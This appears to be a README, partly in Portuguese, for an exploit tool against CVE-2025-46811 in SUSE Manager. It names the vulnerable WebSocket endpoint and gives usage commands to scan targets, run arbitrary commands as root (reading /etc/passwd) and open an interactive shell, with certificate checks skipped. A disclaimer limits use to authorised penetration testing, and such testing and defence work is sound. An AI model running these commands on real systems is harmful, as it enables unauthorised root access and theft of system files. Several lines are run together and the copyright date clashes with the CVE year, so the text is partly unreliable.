
CVE-2025-46811
git clone https://github.com/yourusername/suse-manager-exploit.git
cd suse-manager-exploit
pip install -r requirements.txtpython3 exploit.py scan -i targets.txt -o vulnerable.txt --debug# Single command python3 exploit.py exploit 10.0.0.5 -c "cat /etc/passwd"Interactive shell
python3 exploit.py exploit vulnerable.com --debug
Esta ferramenta é destinada exclusivamente a testes de penetração autorizados e fins educacionais. O uso contra sistemas sem autorização prévia é ilegal.
MIT - Copyright (c) 2023
| Componente | Descrição |
|---|---|
| Endpoint WebSocket | /rhn/websocket/minion/remote-commands |
| Verificação de Vulnerabilidade | Verifica a execução de comandos como root via id |
| Tratamento de SSL | Ignora a verificação de certificados |